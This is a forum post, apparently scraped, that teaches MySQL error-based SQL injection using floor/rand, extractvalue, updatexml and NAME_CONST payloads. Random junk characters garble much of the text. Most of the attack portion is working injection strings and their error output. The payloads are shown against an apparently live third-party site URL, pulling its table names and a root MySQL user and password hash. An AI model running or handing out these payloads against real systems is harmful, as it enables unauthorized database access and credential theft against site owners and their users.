|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
: ]+ O' y6 v9 {4 u7 Q首先进行正常查询: mysql> select * from article where id = 1;
* V$ V* J: T6 N! U/ b8 t1 C+—-+——-+———+7 E) ]& w! Y% W w9 |
| id | title | content |* a4 d ^( N; Q* L
+—-+——-+———+
1 S1 \7 y/ @: l9 q| 1 | test | do it |1 R- e, E1 X+ H! p* D
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; y1 b; [: ^; W) vERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。/ i1 k: r9 z. J* U) C+ A
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);5 C3 C x# s0 L9 I6 T
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));! \7 D; s; k- E' X
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue9 K' S1 _ C( b% t7 l4 p! G0 e
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–8 ?" l9 r" P! v) k. f2 g9 K5 q, s8 r
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
" L5 {0 }! `2 r. ~% ^. g
) N) ^4 v( P! L# ?0 W* W1 h再收集: . Z$ I3 N8 F8 Q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # A0 l# e4 s2 f U, k! f6 A+ q
' X+ I" d" v+ m% s$ T9 L& C
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
& t! u% n: f; E" V
! B' ]2 k' g0 v2 `. A# G; m' ehttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
8 v# X6 @) F" s9 h, g
/ R/ ~4 v, w4 E# G& e+ HErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ % m* F* n7 b) `( J! p" `2 G3 J
1 @' X0 z* `% K. s# p: E B+ I) s& ?* J
MYSQL高版本报错注入技巧-利用NAME_CONST注入+ R7 l& x0 X K: e
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
: D* j% w! W1 T Z( F" ?3 E) a7 e$ O5 Y2 `
# T. G |+ n9 X相关信息5 ^7 i" s& Z2 i+ @ y; {+ q
& ^& ]1 U/ p ~" m" Z$ c
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
: x) h: ]- |( A( m8 |2 z9 ~ y( V" k
Code:/ z* k$ o# P% W
NAME_CONST(DATA, VALUE)# G. W) K7 I. E7 v
& I h8 n2 L+ G R
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.! y, X& @& ?& l
6 C: L0 b8 q) Z, |6 ~& e
SELECT NAME_CONST('TEST', 1)
: ?$ Z, H% X+ E& P0 o4 T4 H6 o
- z9 q" a$ d! V" v5 _$ G
( i- |8 G4 r3 L; q9 n3 J5 h; R- D7 Q% N5 k& F
|---------------|0 W& R/ g: r G$ Q, `
| TEST |. Q" D% \ K9 [ M! v% l- f
| |% O; z) c3 x3 E- s' ]. Z9 f
|---------------|
m `. h3 w& z* o| 1 |
8 Y/ ?& v: c# g| |: z" S7 G2 u4 c3 Q7 b- P8 Z
|---------------|% G6 w( @- ?3 R6 T+ ?1 T
1 K# l2 B6 I! k6 B% W
' t7 T6 W$ t( G% [* I5 i' \. S$ Z3 p7 e5 n9 |' q* s2 X6 Z
9 t9 L. z+ {, A8 N4 r) @5 u
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
' ~8 Q& [ o2 j8 A& ?# [Intro to MySQL Variables3 D8 }5 U3 f* f& U i
& q* f$ ~% |9 ]Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
& k& q0 E/ @: y& Z" f# P
: R G4 S6 l3 Z# |- G2 j# RCode:
; h+ z0 ]# @8 {1 w3 b: `http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
$ X% p2 u" n4 k4 Z8 W' E
W n* f# m/ N# I2 R Q) L" A5 t# U- K; `
8 w. u- `- \. ]2 c o
# H+ o w& g& J. ]
* ] Q2 Y' }. v# CCode:
% c3 I8 G: q7 A6 Cand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--6 L1 s g; n1 a. M, b
9 t& \# y! s7 O# f3 J* A2 K0 F
- m( u: b6 I9 |3 g" ^. CVAR = Your MySQL variable.$ @! n$ \7 s6 B7 g, h; f8 ^
' z9 V+ O" k1 l" o* O* ]( T! ^
MySQL 5.1.3 Server System Variables
9 k5 K; U% W5 Z3 A$ n% r, q6 e, H6 S+ ]" o: F. d' i
Let's try it out on my site... Q, t0 U+ s; c
- X" l2 K" W$ N# B1 T
Code:
! N0 S4 t7 x# t% K, x+ p' i3 ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--* P4 q2 Q9 V. f1 i- a# O. g8 k5 d
L$ q5 |7 `' y ZErroruplicate column name '5.0.27-community-nt'
1 s4 j2 C' t) U% O( T$ s) g8 L6 v% a" e# w
/ k# Q7 i+ g+ U: }
0 k2 I" P* j4 m6 \; Q: B
3 Z8 v/ X$ f' X$ R1 j! W3 I9 R* N( H8 r2 u* d. i9 U
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...4 P( r( U1 `5 q$ } y% S
7 ^9 N/ ?8 {8 NData Extraction0 h! X* J& ?4 S$ A& w! t5 F4 n$ E
6 _' [: }6 x7 E8 UCode:
4 T+ t% \& ~- m( _8 D( \+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
5 q' j; M/ P$ ~; w% m u/ L- [0 w& s2 p& {4 S/ I
& L' _+ K# Z/ \( |% }We should get a duplicate column 1 error...
8 i" M; R8 k d* r" K0 F [9 @6 ?8 r; X4 Y8 e4 ?/ n& `! w
Code:
% S {: ]" A8 t6 F3 W; _5 C/ Fhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
! J" F# ^) D; P9 t4 |
. I4 L G4 u! n: ?- JErroruplicate column name '1
9 L V+ J0 w* Z$ ~% d3 K% O* U
* m' I* U, _4 p. T" M( I* w T' o& p+ q Z/ n3 ^7 |, @" J9 q
4 R* i1 \6 p0 w5 n1 D, T
$ [3 }- ]& G0 n
$ u! s/ f& J) r+ y+ V. K
* G# @, f+ i$ O5 @3 ]Now let's get the tables out this bitch..
/ E5 r8 Z, e- b- s T* r% K/ E0 h s7 B1 w
Code:) q# b+ Q) w, R C
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
5 k7 W8 \8 r% f5 @. j4 f% F' J% Z. u) ?, \/ H# ~* E( @
0 o. x" k: ~2 C5 ^0 n# A4 G
Let's see if it works here, if it does, we can go on and finish the job." g7 N7 g" d( E6 U5 ]7 ]
/ p" i V/ O; B1 Y9 H
Code:% a5 o4 _- f. V* M' H
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
: A* T7 Z; k, ^$ {. S
5 ~% _4 }, E7 V' L- C1 z# _$ v' d+ m1 k2 N5 t
Erroruplicate column name 'com_admanage
& \0 x, _5 a8 m( d& e2 t1 j9 ^* m1 J
- x7 c* t" |, {' \
$ O1 z; D' N0 q5 G3 ~& u! j7 ^7 A/ p7 K( X8 W
. y- m$ ~% g: i7 R3 u" V
0 z; i1 i4 |9 H0 I2 vNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.: Q1 i+ T% ]: d2 e' H
8 h6 L U0 D1 h; S2 G: j2 {
Let's get the columns out of the user table.." c0 K7 f: F! i1 ?- V0 `+ \4 V
3 Z3 ^2 o* {) g
Code:, Y$ |1 `$ q+ D6 B$ @
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
$ U1 \. n' U ~( b X# S! t% F
/ `, ~2 @1 r0 q' L0 O5 F$ S( n# U, W/ k( u; q" B" m
So mine looks like this, and I get the duplicate column name 'Host'.
h8 n; U" m6 B! [% I9 H' O' `8 ^5 i8 t$ x J
Code:& D2 x/ V _8 |; I" S9 B' ?
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
* U; I9 O3 i2 {3 k, F+ J2 E$ h
+ Z$ i5 M5 b4 Y. _/ b/ aErroruplicate column name 'Host'. ~5 G, E F) n( e# ^
6 Z' b+ I: _$ [! g& R6 J
K# P# d( Z" X# y* e Q. y, W( x3 S
+ {. e" @) N8 o% a* d1 N' O2 i+ x8 Q; w7 z3 Z3 p: ?( p
k) T ]! _% ^* b2 m o
% Y: e9 M- n% U6 R% ~. f4 rWoot, time to finish this bitch off.
6 X% I; k$ ^$ h3 l$ m# \: Q8 M: u& W2 L
Code:
# {9 w# c$ w U4 A* u& ?, ?3 d+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--& U& d3 z( w" U* C; @
' u* F/ W r9 d( P1 s- ^
( k- S, I" x6 _- I3 oSo mine looks like this...
) S# m3 w# ~- ~( _+ w( ? J
T5 n! Y$ i. @* aCode:% \: C# s0 C& O
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--2 X. X) X6 o$ u9 I3 ^
( E) U: _6 q7 S% z$ s+ T. D" BErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'2 n2 `8 V) d3 m* @; |
8 B; z' J9 ]( N6 G; A6 `1 r' J: Y
. P8 H- x- L( n: S
( f0 O* R y7 Z$ d
7 _- k$ c; w( k$ b4 V5 H5 U1 s3 x
& { n- L: ?2 |7 G: @: e# [
( t; H x6 N2 G2 g8 |) [And there we have it, thanks for reading.! A( S0 E+ r1 S$ w( \
Q% g* X3 h) t
|
发表于 2015-11-11 19:03:37
收藏
支持
反对